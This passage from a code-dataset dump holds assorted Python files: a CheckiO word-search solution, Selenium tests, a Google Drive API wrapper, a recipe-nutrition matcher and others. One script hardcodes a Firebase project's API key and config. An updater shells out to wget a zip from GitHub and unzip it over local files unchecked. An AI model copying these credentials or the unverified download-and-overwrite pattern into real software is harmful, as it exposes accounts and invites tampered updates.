h5file['train_data'][...]\n read_data = np.array(read_data, dtype=np.float32)\n\n return read_data\n\n\n","sub_path":"data_inpute_mask.py","file_name":"data_inpute_mask.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"441718006","text":"from api.model_unofficial_api import ModelBasedOnUnofficialAPI\nfrom view.view_command_line import ViewCommandLineBased\nfrom view.view_to_model_adapter import ViewToModelAdapter\n\n\nclass BasicController:\n\n def __init__(self):\n self.model = ModelBasedOnUnofficialAPI()\n view_to_model_adapter = ViewToModelAdapter(self.model)\n self.view = ViewCommandLineBased(view_to_model_adapter)\n\n def run(self):\n self.view.run()\n\n\nif __name__ == '__main__':\n controller = BasicController()\n controller.run()\n","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"392051694","text":"from itertools import zip_longest\n\ndef find_start(text, word):\n\n start_pos = text.find(word)\n if start_pos >= 0:\n line_number = text.count('\\n', 0, start_pos)\n line_start = text.rfind('\\n', 0, start_pos)\n row_start = line_number + 1\n column_start = start_pos - line_start\n return row_start, column_start\n\ndef checkio(text, word):\n text = text.replace(' ', '').lower()\n distance = len(word) - 1\n start = find_start(text, word)\n if start:\n row_start, column_start = start\n return [row_start, column_start, row_start, column_start + distance]\n else:\n text = '\\n'.join(''.join(x) for x in zip_longest(*text.split('\\n'), fillvalue=''))\n start = find_start(text, word)\n column_start, row_start = start\n return [row_start, column_start, row_start + distance, column_start]\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio(\"\"\"DREAMING of apples on a wall,\nAnd dreaming often, dear,\nI dreamed that, if I counted all,\n-How many would appear?\"\"\", \"ten\") == [2, 14, 2, 16]\n assert checkio(\"\"\"He took his vorpal sword in hand:\nLong time the manxome foe he sought--\nSo rested he by the Tumtum tree,\nAnd stood awhile in thought.\nAnd as in uffish thought he stood,\nThe Jabberwock, with eyes of flame,\nCame whiffling through the tulgey wood,\nAnd burbled as it came!\"\"\", \"noir\") == [4, 16, 7, 16]\nprint(\"Coding complete? Click 'Check' to earn cool rewards!\")\n","sub_path":"The Hidden Word/mission.py","file_name":"mission.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"573411305","text":"import pyrebase\n\nfirebaseConfig = {\n 'apiKey': \"AIzaSyBQwup5w7OoBcSrn8_ggVivckCJ2TSN3AQ\",\n 'authDomain': \"fundpak-531e2.firebaseapp.com\",\n 'projectId': \"fundpak-531e2\",\n 'storageBucket': \"fundpak-531e2.appspot.com\",\n 'messagingSenderId': \"588369785043\",\n 'appId': \"1:588369785043:web:b0a25f4da16f657302e426\",\n 'measurementId': \"G-1NZH718QKV\",\n 'databaseURL': 'https://fundpak-531e2.firebaseio.com'\n}\n\n\nfirebase = pyrebase.initialize_app(firebaseConfig)\nauthf = firebase.auth()\nauthf.sign_in_with_email_and_password()\n\n#\n# db = firebase.database()\n# db.child(\"users\").child(\"23P4V4uBbWamCeLw3kUUtcrW47y1\").child(\"email\").get()\n\n\nimport firebase_admin\nfrom firebase_admin import credentials, firestore\n\ncred = credentials.Certificate(\"./fundpak-531e2-firebase-adminsdk-x9xtf-fa810f22e3.json\")\nfirebase_admin.initialize_app(cred)\n\ndb = firestore.client()\ndb.collection(\"users\").document(user['localId'])","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"15743727","text":"from django.conf.urls import url\nfrom . import views\n\n\n\nurlpatterns = [\n\n\turl(r'^start$',views.startorder, name='start'),\n\turl(r'^end/$',views.endorder, name='end'),\n\turl(r'^merci/$', views.terminer, name='terminer'),\n\t]\n","sub_path":"simpleorder/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"376257340","text":"#########################################################################################################################################################################\n# Author : Remi Monthiller, remi.monthiller@etu.enseeiht.fr\n# Adapted from the code of Raphael Maurin, raphael.maurin@imft.fr\n# 30/10/2018\n#\n# Incline plane simulations\n#\n#########################################################################################################################################################################\n\n# import lib\nimport os\nimport matplotlib.pyplot as plt\n\n# import params\nexecfile('params.py')\n\n# Simulation\ntry:\n\tdatas = os.listdir(\"data\")\nexcept:\n\tos.mkdir(\"data\")\n\tdatas = False\nif datas:\n\tfor i in range(len(datas)):\n\t\tdatas[i] = float(datas[i].split(\".yade\")[0])\n\tdatas.sort()\n\t# import PyRunners\n\texecfile('framework.py')\n\texecfile('../common/simulationPyRunners.py')\n\tO.load(\"data/\"+str(datas[-1])+\".yade\")\n\t# Reload parameters\n\texecfile('params.py')\n\tif pN.enable_new_engines:\n\t\texecfile('../common/simulationDefinition.py')\n\t\tfor e in O.engines:\n\t\t\tdel e\n\t\tsim.engineCreation()\n\t\t#sim.init()\n\t\t#O.resetTime()\n\t\tO.saveTmp()\n\tO.run()\nelse:\n\t# import simulation\n\texecfile('framework.py')\n\texecfile('../common/simulationDefinition.py')\n\tsim.simulation()\n\tO.run()\nO.wait()\n","sub_path":"common/caseBatch.py","file_name":"caseBatch.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"460838460","text":"#Read-in script for 2007 brief summary text\n# Importing necessary packages.\nimport os\nimport zipfile as zip\nimport pandas as pd\nimport csv\nimport numpy as np\n\n# Set up file path:\n# Please include the folder path of the file you are reading. Ex: os.chdir(\"C:/Users/johnsmith/Downloads\")\nos.chdir(\"\")\n\nfile_name = \"brf_sum_text_2007.tsv.zip\"\nf_name = \"brf_sum_text_2007.tsv\"\n# Selecting the zip file.\nzf = zip.ZipFile(file_name)\n# Reading the selected file in the zip.\nchunksize = 10 ** 4\ncount = 1\nn_obs = 0\nfinal = []\nfor df in pd.read_csv(zf.open(f_name), delimiter=\"\\t\", chunksize=chunksize, quoting=csv.QUOTE_NONNUMERIC):\n print('processing chunk: ' + str(count))\n n_obs += len(df)\n count += 1\n final.append(df)\n# Create data frame with all observations\ndf = pd.concat(final)\n# Print summary of data: number of observations, columns, and each variable data type\nprint(n_obs)\nprint(df.dtypes)","sub_path":"04_bulk_pregrant_read_in/Python Scripts/brf_sum_text_2007.py","file_name":"brf_sum_text_2007.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"490780221","text":"import json\nfrom fuzzywuzzy import fuzz\n##load reduced recipe with units data\njson_file='reduced_recipes_with_units.json'\njson_data=open(json_file)\nrecipe_data = json.load(json_data)\njson_data.close()\n##load nutrition file\njson_file2='nutrition_reduced.json'\njson_data2=open(json_file2,'r')\nnutrition_data = json.load(json_data2)\njson_data2.close()\ntext_file = open(\"Output.txt\", \"w\")\ndef strip(string):\n\tnewstr = string.replace(\"(\", \"\")##delete the '(),'\n\tnewstr=newstr.replace(\")\", \"\")\n\tnewstr=newstr.replace(\",\", \"\")\n\treturn newstr\n\n##Define a list of recognizatle units and frequent words that appear in recipes. \nrelevantUnits = ['cup', 'cups', 'teaspoon', 'fresh', 'leaves', \n'unsweetened', 'sweetened', 'medium', 'diced' ,'large', 'small', \n'tbsps', 'tsps', 'teaspoons', 'pounds', 'ground', 'seed', 'tbsp', \n'tsp', 'pound', 'lb', 'tablespoon','tablespoons', 'ounces', 'oz', \n'chopped', 'canned', 'drained', 'cubes', 'brown', 'ripe', 'powdered', \n'sliced', 'slices', 'slice', 'preserves', 'minced', 'seeded', \n'toasted', 'quartered', 'minced', 'strips', 'with', 'crushed','cured', \n'thredded', 'powdered', 'grated', 'mixed', 'hard-cooked']\ndef strToFloat(string):\n\ttry:\n\t\treturn float(string)\n\texcept:\n\t\treturn False\n###Function that modifies nutrition data to suit the quantity taken from recipe\ndef modifyNutrition(ingredient):\n##TODO: if ingredient['magnitude']==0, use data from nutrition data. \n\tif ingredient['magnitude']!='0' and ingredient['unit']=='NA':\n\t\tfor k in ingredient['nutrition_data']:\n\t\t\tif k!='GmWt_1' and\tk!='GmWt_Desc1' and k!='GmWt_2' and k!='GmWt_Desc2' and k!='Shrt_Desc' and k!='NDB_No':\n\t\t\t\tif(ingredient['nutrition_data']['GmWt_1']!=''):\n\t\t\t\t\tingredient['nutrition_data'][k]=strToFloat(ingredient['nutrition_data']['GmWt_1'])/100*strToFloat(ingredient['magnitude'])\n\t\t\t\t\t# print('a')\n\t\t\t\telse:\n\t\t\t\t\tingredient['nutrition_data'][k]=strToFloat(ingredient['nutrition_data']['GmWt_2'])/100*strToFloat(ingredient['magnitude'])\n\t\t\t\t\t# print('b')\n\tif ingredient['magnitude']!='0' and ingredient['unit']!='NA':\n\t\tfor k in ingredient['nutrition_data']:\n\t\t\tif k!='GmWt_1' and\tk!='GmWt_Desc1' and k!='NDB_No' and k!='GmWt_2' and k!='GmWt_Desc2' and k!='Shrt_Desc':\n\t\t\t\tingredient['nutrition_data'][k]=strToFloat(ingredient['magnitude'])*strToFloat(ingredient['nutrition_data'][k])\n\t\t\t\t# print('c')\n\treturn ingredient['nutrition_data']\n\ntotalscore = 0\n\nparseData = []\ndata = nutrition_data['SUGARS,GRANULATED'] \n\nfor recipe in recipe_data:\n\tnewData = {}\n\t# print(recipe)\n\tlistRecipe={}\n\tfor ingredient in recipe['new ingredients']:\n\n\t\tmaxRatio = 0\n\t\tmatched = ''\n\t\tname = ingredient['name']\n\t\tisSugar = False\n\t\tlistName = name.split(' ')\n\t\tfor word in listName:\n\t\t\tif strip(word.strip()) in relevantUnits:\n\t\t\t\t# print (word)\n\t\t\t\tlistName.remove(word)\n\t\t\t\tname = ' '.join(listName)\n\t\t\t# if strToFloat(word)!=False:\n\t\t\tif strip(word.strip())=='sugar':\n\t\t\t\tisSugar = True\n\t\t\t\tname = 'SUGARS,GRANULATED'\n\t\t\tif strip(word.strip())=='salt':\n\t\t\t\tisSalt = True\n\t\t\t\tname = 'SALT,TABLE'\n\t\t\tif strip(word.strip())==('eggs' or 'egg'):\n\t\t\t\t# isSalt = True\n\t\t\t\tname = 'EGG,WHL,RAW,FRSH'\n\t\t\t\n\t\tfor k in name:\n\t\t\t# print (k)\n\t\t\tif strToFloat(k)!=False or k=='/':\n\t\t\t\tname = name.replace(k,'')\n\t\t# print (name)\n\t\t##The \n\t\tNDBno = ''\n\t\tdatum = ''\n\t\t# for item in nutrition_data:\n\t\t# \t# print (nutrition_data[item])\n\t\t\t\n\t\t# \tdescription = nutrition_data[item]['Shrt_Desc'].lower()\n\t\t# \tdescription = description.split(',')\n\t\t# \tif len(description)>=2:\n\t\t# \t\tdescription = description[0] + ' ' + description[1]\n\t\t# \t\t# print(type(fuzz.ratio(name, item)))\n\t\t# \t\t##perform fuzzy search and calculate similarity\n\t\t# \ttoken_set_Ratio = fuzz.token_set_ratio(name, description)\n\t\t# \tratio = fuzz.ratio(name, description)\n\t\t# \tpartialRatio = fuzz.partial_ratio(name, description)\n\t\t# \ttoken_sort_Ratio = fuzz.token_sort_ratio(name, description)\n\t\t# \tratios = [token_set_Ratio, partialRatio, token_sort_Ratio]\n\t\t# \tbestRatio = max(ratios)\n\t\t# \tif maxRatio ==0 or bestRatio>maxRatio:\n\t\t# \t\tmaxRatio = bestRatio\n\t\t# \t\ttotalscore+=maxRatio\n\t\t# \t\tmatched = description\n\t\t# \t\tNDBno = nutrition_data[item]['NDB_No']\n\t\t# \t\tdatum = item\n\t\t# newData[ingredient['name']] = NDBno\n\tlistRecipe[recipe['title']] = newData\n\tprint(listRecipe)\n\tparseData.append(listRecipe)\n\n\t\t\n\t\t# ingredient['nutrition_data'] = nutrition_data[datum]\n\t\t# \t# print(ingredient['nutrition_data'])\n\t\t# \t##TODO: if ingredient['magnitude']==0, use data from nutrition data. \n\t\t# ingredient['nutrition_data']=modifyNutrition(ingredient)\n\t\t# print(ingredient['magnitude'])\n\t\t# print(ingredient['nutrition_data'])\n\t\t# print(ingredient['name'], ' ', datum)\n\t\t\n\t\t# print (nutrition_datum)\n\t\n\t# print(newData)\n\t# parseData.append(newData)\t\n\t# parseData.append(newData)\n\t\t# print (\"Name of ingredient: \", str(name))\n\t\t# print(\"Score of similarity: \" ,str(maxRatio))\n\t\t# print( \"Matched to: \", str(matched))\n\t\t# print(\"Matched number: \", str(NDBno))\nprint (parseData)\nwith open('reduced_recipes_with_nutrition.json', 'w') as outfile:\n\t\tjson.dump(parseData, outfile)\n# print(\"TOTAL SCORE: \" ,totalscore)\n\n##write final parsed data to the outfile\n\n\n","sub_path":"data/Python/match_ingredients.py","file_name":"match_ingredients.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"603251022","text":"import unittest\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support import expected_conditions as expected\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nBaseURL = os.environ.get('BaseURL')\n\nclass Remix_Tests(unittest.TestCase):\n\n def setUp(self):\n options = Options()\n options.add_argument('-headless')\n options.add_argument('--disable-dev-shm-usage')\n options.add_argument('--no-sandbox')\n self.driver = Chrome(executable_path='/usr/local/bin/chromedriver', options=options)\n\n def test_check_showcase_link(self):\n driver = self.driver\n driver.get(\"https://\" + BaseURL)\n showcase = driver.find_element_by_link_text(\"Explore\")\n showcase.click()\n\n def test_check_media_link(self):\n driver = self.driver\n driver.get(\"https://\" + BaseURL)\n media = driver.find_element_by_link_text(\"Learn\")\n media.click()\n\n def test_check_projects_link(self):\n driver = self.driver\n driver.get(\"https://\" + BaseURL)\n projects = driver.find_element_by_link_text(\"Build\")\n projects.click()\n\n def test_verify_media_corps(self):\n driver = self.driver\n driver.get(\"https://\" + (BaseURL) + \"/media-corps\")\n\n def tearDown(self):\n self.driver.close()\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"spec/selenium/chrome_test.py","file_name":"chrome_test.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"49831225","text":"from sc_desktop import handler\nfrom steamcontroller.events import Pos\n\n\nclass Handler(handler.Handler):\n def __init__(self, *args, **kwargs):\n self.feature_points = kwargs.pop('features')\n self.feature_radius2 = kwargs.pop('radius')**2\n self.n_hit = kwargs.pop('n_hit')\n self.haptic = kwargs.pop('haptic', None)\n self._gestures = kwargs.pop('gestures')\n\n kwargs.pop('wnd')\n super(Handler, self).__init__(*args, **kwargs)\n\n self._feature = None\n self._count = 0\n self._hit_list = []\n\n def _first_padtouch(self, x, y):\n self.ix, self.iy = x, y\n self._count = 0\n self._hit_list = []\n self._feature = None\n\n def _pad_touch(self, pad, x, y):\n for i, (fx, fy) in enumerate(self.feature_points):\n dx, dy = x - fx, y - fy\n if (dx**2 + dy**2) <= self.feature_radius2:\n if self._feature is None:\n self._feature = i\n self._count = 1\n elif i == self._feature:\n self._count += 1\n break\n else:\n return\n\n if self._hit_list and self._hit_list[-1] == i:\n return\n\n self._hit_list.append(i) \n if self.haptic is not None:\n self.haptic_fb(pad, self.haptic['amplitude'])\n\n for g in self._gestures:\n if g['features'] == self._hit_list:\n self.do_action(g['action'])\n\n def pad_touch_left(self, x, y):\n self._pad_touch(Pos.LEFT, x, y)\n\n def pad_touch_right(self, x, y):\n self._pad_touch(Pos.RIGHT, x, y)\n\n def first_pad_touch_right(self, x, y):\n self._first_padtouch(x, y)\n\n def first_pad_touch_left(self, x, y):\n self._first_padtouch(x, y)\n","sub_path":"sc_desktop/handlers/padgesture.py","file_name":"padgesture.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"588644833","text":"#!/usr/bin/env python\nimport os, sys, subprocess\nfrom time import sleep\ndef file_get_contents(filename):\n with open(filename) as f:\n return f.read()\nprint('Getting Latest Update!')\nonline_version = subprocess.check_output(\"curl https://raw.githubusercontent.com/PythonMatrix/PythonMatrix/master/docs/version\", shell=True)\nlocal_version = file_get_contents('./docs/version')\nprint(local_version)\nif local_version != online_version:\n print('Updating...')\n subprocess.check_output(\"cd ..\", shell=True)\n subprocess.check_output(\"wget https://github.com/PythonMatrix/PythonMatrix/blob/updates/PMLatest.pythonmatrix?raw=true\", shell=True)\n subprocess.check_output(\"unzip -o PMLatest.pythonmatrix\", shell=True)\n subprocess.check_output(\"rm PMLatest.pythonmatrix\", shell=True)\n print(\"Please Restart PythonMatrix for updates to install.\")\nelse:\n print('You have the Latest Version!')\n# if subprocess.check_output(\"cat docs/version\", shell=True) == subprocess.check_output(\"curl https://raw.githubusercontent.com/PythonMatrix/PythonMatrix/master/docs/version\", shell=True)\n","sub_path":"pythonmatrix/files/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"443658398","text":"import os, sys, time, itertools\nimport pandas as pd\nimport sklearn.linear_model\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\n\ndef main():\n data_core = pd.read_csv('pk.labeled.tsv',sep='\\t',header=None)\n data_extra = pd.read_csv('pk.nlm180.tsv',sep='\\t',header=None)\n\n X_core = data_core[1].tolist()\n y_core = data_core[0].tolist()\n\n X_extra = data_extra[4].tolist()\n y_extra = [ y if isinstance(y,str) else 'NULL' for y in data_extra[3].tolist() ]\n\n y_extra_yep = data_extra[2].tolist()\n\n vx = CountVectorizer(ngram_range=(1,4),\n token_pattern=r'\\b\\w+\\b', \n min_df=1)\n vx.fit(X_core + X_extra)\n\n m1 = sklearn.linear_model.LogisticRegression(C=1.0)\n label_space = list(set(y_core))\n\n print('Starting with {} unlabeled examples'.format(len(y_extra)))\n\n X_aux, y_aux = aux_dataset(X_extra, y_extra)\n m1.fit(vx.transform(X_core + X_aux), y_core + y_aux)\n\n y_proba = m1.predict_proba(vx.transform(X_extra))\n y_pred = m1.predict(vx.transform(X_extra))\n \n confidence = np.max(y_proba,axis=-1)\n easy = np.where(confidence > 0.6)[0].tolist()\n\n easy = [ idx for idx in easy if y_extra[idx] == 'NULL' ]\n\n increase_codes = ['C54355', 'C54602', 'C54603', 'C54604', 'C54605',\n 'C54357','C54610','C54611','C54612','C54613']\n \n adding = 0\n for idx in easy:\n if y_pred[idx] in increase_codes and y_extra_yep[idx] == 'Increase_Interaction':\n y_extra[idx] = y_pred[idx]\n adding += 1\n elif y_pred[idx] not in increase_codes and y_extra_yep[idx] == 'Decrease_Interaction':\n y_extra[idx] = y_pred[idx]\n adding += 1\n else:\n y_extra[idx] = 'TODO'\n \n if len(y_aux) > 3:\n remains = list(y_extra).count('NULL')\n m1.fit(vx.transform(X_aux),y_aux)\n fit = m1.score(vx.transform(X_core),y_core)\n print('{} easy, +{} added, {} remaining :: fit> {:.2%}'\n .format(len(easy), adding, remains,fit))\n else:\n print('initialized')\n \n data_extra[3] = y_extra\n data_extra.to_csv('pk.nlm180.tsv',sep='\\t',index=False,header=False)\n \ndef aux_dataset(X,y, save_idx = None):\n X_aux = []\n y_aux = []\n new_idx = None\n for i in range(len(y)):\n if y[i] != 'NULL':\n X_aux.append(X[i])\n y_aux.append(y[i])\n if save_idx is not None and i == save_idx:\n new_idx = len(y_aux)-1\n \n if new_idx is not None:\n return X_aux, y_aux, new_idx\n else:\n return X_aux, y_aux\n\ndef brute_search(vx, X_core, y_core, X_extra, y_extra, exid, label_space):\n m = sklearn.linear_model.LogisticRegression(C=10)\n scores = []\n for c in label_space:\n y_extra_tmp = [ y if i != exid else c for i, y in enumerate(y_extra) ]\n X_aux, y_aux, new_id = aux_dataset(X_extra, y_extra_tmp, save_idx = exid)\n sample_weight = np.ones(len(y_aux))\n sample_weight[new_id] = len(y_aux)/10.0\n m.fit(vx.transform(X_aux),y_aux, sample_weight=sample_weight)\n scores.append(m.score(vx.transform(X_core),y_core))\n \n maximum = np.max(scores)\n if len(np.where(scores >= maximum)[0]) > 1:\n return None\n else:\n return label_space[np.argmax(scores)]\n\nif __name__ == '__main__':\n main()","sub_path":"dataset/pk_bootstrap/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"25004666","text":"import json\nfrom datetime import datetime, timedelta, timezone\nfrom urllib.parse import urlencode\n\nimport requests\nfrom dateutil import parser\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.http import *\n\nfrom .models import *\n\n\ndef add_storage_account(request, next_url, cloud):\n if 'error' in request.GET:\n error_message = 'An error occurred: ' + request.GET['error']\n messages.error(request, error_message)\n return HttpResponseRedirect(next_url)\n elif 'code' in request.GET:\n try:\n r = requests.post('https://www.googleapis.com/oauth2/v4/token',\n {'code': request.GET['code'], 'client_id': settings.GDRIVE_APP_KEY,\n 'client_secret': settings.GDRIVE_APP_SECRET,\n 'redirect_uri': settings.GDRIVE_REDIRECT_URL, 'grant_type': 'authorization_code'})\n credentials = r.json()\n expire_at = (datetime.now(timezone.utc) + timedelta(0, credentials['expires_in'])).isoformat()\n access_token = credentials['access_token']\n refresh_token = credentials['refresh_token']\n r = requests.get(\"https://www.googleapis.com/oauth2/v3/userinfo\",\n headers={'Authorization': 'Bearer ' + access_token})\n about = r.json()\n uid = about['sub']\n full_name = about['name']\n email = about['email']\n except Exception as e:\n messages.error(request, 'An error occurred: ' + str(e))\n else:\n if StorageAccount.objects.all().filter(identifier=uid).exists():\n messages.warning(request, 'This Google Drive space is already linked')\n else:\n sa = StorageAccount(user=request.user, cloud=cloud, identifier=uid, status=1,\n user_full_name=full_name, email=email,\n credentials=json.dumps({'a': access_token, 'r': refresh_token, 'e': expire_at}))\n sa.save()\n messages.success(request, 'A new Google Drive space is now linked to your account')\n return HttpResponseRedirect(next_url)\n else:\n url = 'https://accounts.google.com/o/oauth2/v2/auth'\n param = urlencode({'client_id': settings.GDRIVE_APP_KEY, 'redirect_uri': settings.GDRIVE_REDIRECT_URL,\n 'response_type': 'code', 'scope': settings.GDRIVE_SCOPE, 'access_type': 'offline',\n 'prompt': 'consent select_account'})\n return HttpResponseRedirect(url + '?' + param)\n\n\ndef get_client(acc: StorageAccount) -> str:\n cred = json.loads(acc.credentials)\n expire_at = parser.parse(cred['e'])\n delta = (expire_at - datetime.now(timezone.utc)).total_seconds()\n if delta < 60:\n r = requests.post('https://www.googleapis.com/oauth2/v4/token',\n {'client_id': settings.GDRIVE_APP_KEY, 'client_secret': settings.GDRIVE_APP_SECRET,\n 'refresh_token': cred['r'], 'grant_type': 'refresh_token'})\n if r.status_code == 200:\n j = r.json()\n cred['a'] = j['access_token']\n cred['e'] = (datetime.now(timezone.utc) + timedelta(0, j['expires_in'])).isoformat()\n acc.credentials = json.dumps(cred)\n acc.save()\n return cred['a']\n\n\ndef get_space(g: str) -> dict:\n r = requests.get(\"https://www.googleapis.com/drive/v3/about\", params={'fields': 'storageQuota'},\n headers={'Authorization': 'Bearer ' + g})\n res = r.json()\n used = res['storageQuota']['usage']\n total = res['storageQuota'].get('limit', None)\n return {'used': used, 'total': total}\n\n\ndef find_path_id(g: str, path: str, create: bool = False, is_file=False) -> str:\n fid = 'root'\n if path == '/':\n return fid\n levels = path.strip('/').split('/')\n try:\n for level in levels:\n q = \"'%s' in parents and name='%s' and trashed=false\" \\\n % (fid.replace(\"'\", \"\\\\'\"), level.replace(\"'\", \"\\\\'\"))\n if not is_file:\n q += \" and mimeType='application/vnd.google-apps.folder'\"\n r = requests.get(\"https://www.googleapis.com/drive/v3/files\",\n params={'q': q, 'fields': \"files(id,mimeType)\"},\n headers={'Authorization': 'Bearer ' + g})\n fs = r.json()['files']\n if len(fs) < 1:\n if create:\n fid = create_folder_with_parent_id(g, fid, level)\n else:\n return ''\n else:\n fid = fs[0]['id']\n except:\n return ''\n return fid\n\n\ndef create_folder(g: str, path: str, name: str) -> dict:\n if path == 'root' or path + name == '/':\n return {'id': 'root'}\n fullpath = path if name == '' else path + name\n return {'id': find_path_id(g, fullpath, True)}\n\n\ndef create_folder_with_parent_id(g: str, parent: str, name: str) -> str:\n r = requests.post('https://www.googleapis.com/drive/v3/files',\n json={'mimeType': 'application/vnd.google-apps.folder',\n 'parents': [parent],\n 'name': name},\n headers={'Authorization': 'Bearer ' + g})\n return r.json()['id']\n\n\ndef get_file_list(g: str, path: str) -> list:\n fid = find_path_id(g, path)\n if fid == '':\n return []\n r = requests.get('https://www.googleapis.com/drive/v3/files',\n params={'q': \"'%s' in parents and trashed = false\" % fid.replace(\"'\", \"\\\\'\"),\n 'fields': 'files(id,mimeType,modifiedTime,name,size)'},\n headers={'Authorization': 'Bearer ' + g})\n fs = r.json()\n ret = []\n try:\n for f in fs['files']:\n try:\n if f['mimeType'] == 'application/vnd.google-apps.folder':\n ret.append({'name': f['name'], 'id': f['id'], 'is_folder': True})\n else:\n ret.append({'name': f['name'], 'id': f['id'], 'size': f.get('size', 0),\n 'time': parser.parse(f['modifiedTime']), 'is_folder': False})\n except:\n raise\n except:\n raise\n return ret\n\n\ndef get_down_link(g: str, fid: str, path: str) -> str:\n if not fid:\n fid = find_path_id(g, path, False, True)\n r = requests.get('https://www.googleapis.com/drive/v3/files/' + fid,\n params={'fields': 'mimeType,webContentLink,webViewLink'},\n headers={'Authorization': 'Bearer ' + g})\n j = r.json()\n if j['mimeType'].startswith('application/vnd.google-apps.'):\n if 'webContentLink' in j:\n return j['webContentLink']\n elif 'webViewLink' in j:\n return j['webViewLink']\n else:\n raise Exception('File not found')\n else:\n r = requests.get('https://www.googleapis.com/drive/v3/files/' + fid,\n params={'alt': 'media', 'access_token': g},\n allow_redirects=False)\n if r.status_code < 300 or r.status_code >= 400:\n r.raise_for_status()\n if 'Location' in r.headers:\n return r.headers['Location']\n else:\n raise Exception('File not found')\n\n\ndef get_upload_creds(g: str, data: str) -> dict:\n try:\n j = json.loads(data)\n parent = j['parent']\n name = j['name']\n except:\n return {}\n r = requests.get('https://www.googleapis.com/drive/v3/files',\n params={'q': \"'%s' in parents and name='%s' and trashed=false and \"\n \"mimeType!='application/vnd.google-apps.folder'\"\n % (parent.replace(\"'\", \"\\\\'\"), name.replace(\"'\", \"\\\\'\")),\n 'fields': 'files(id)'},\n headers={'Authorization': 'Bearer ' + g})\n fs = r.json()['files']\n if len(fs) < 1:\n r = requests.post('https://www.googleapis.com/upload/drive/v3/files?uploadType=resumable',\n json={'parents': [parent], 'name': name},\n headers={'Authorization': 'Bearer ' + g})\n else:\n r = requests.patch('https://www.googleapis.com/upload/drive/v3/files/%s?uploadType=resumable' % fs[0]['id'],\n headers={'Authorization': 'Bearer ' + g})\n return {'url': r.headers['Location']}\n\n\ndef delete(g: str, data: list) -> dict:\n for id in data:\n try:\n r = requests.delete('https://www.googleapis.com/drive/v3/files/' + id,\n headers={'Authorization': 'Bearer ' + g})\n except Exception as e:\n print(str(e))\n return {}\n\n\ndef rename(g: str, data: list, to: str) -> dict:\n for id in data:\n try:\n r = requests.patch('https://www.googleapis.com/drive/v3/files/' + id,\n json={'name': to},\n headers={'Authorization': 'Bearer ' + g})\n except Exception as e:\n print(str(e))\n return {}\n","sub_path":"bigbox/gdrive_interface.py","file_name":"gdrive_interface.py","file_ext":"py","file_size_in_byte":9194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"486730409","text":"# -*- coding:utf-8 -*-\r\nclass ListNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.next = None\r\nclass Solution:\r\n def deleteDuplication(self, pHead):\r\n # 链表1->2->3->3->4->4->5 处理后为 1->2->5\r\n if not pHead or not pHead.next:\r\n return pHead\r\n dummy = ListNode(-1)\r\n dummy.next = pHead\r\n pre, slow, fast = dummy, dummy.next, dummy.next.next\r\n while fast:\r\n if slow == fast:\r\n while slow == fast:\r\n fast =fast.next\r\n pre.next = fast\r\n slow = fast\r\n fast = fast.next\r\n if not fast:\r\n return dummy.next\r\n else:\r\n pre, slow, fast = pre.next, slow.next, fast.next\r\n return dummy.next\r\n\r\n","sub_path":"towords_offer/linked list/18-2 删除链表重复的节点.py","file_name":"18-2 删除链表重复的节点.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"176668552","text":"\"\"\"\nidea: If the node has a right child, and hence its successor is somewhere lower in the tree. Go to the right once and then as many times to the left as you could. Return the node you end up with.\nNode has no right child, and hence its successor is somewhere upper in the tree. Go up till the node that is left child of its parent. The answer is the parent.\n\"\"\"\n\n\nfrom bintree_class import TreeNode\n\n\ndef get_io_successor(root, target):\n candidate = None\n while root:\n if root.val == target:\n if root.right is not None:\n candidate = root.right\n while candidate.left is not None:\n candidate = candidate.left\n root = None\n elif target < root.val:\n candidate = root\n root = root.left\n else:\n root = root.right\n return candidate.val\n\n\ndef get_inorder(root):\n if root is None:\n return None\n get_inorder(root.left)\n print(root.val)\n get_inorder(root.right)\n\n\ndef insert(root, val):\n if root is None:\n root = TreeNode(val)\n else:\n if val > root.val:\n if root.right is None:\n root.right = TreeNode(val)\n else:\n insert(root.right, val)\n else:\n if root.left is None:\n root.left = 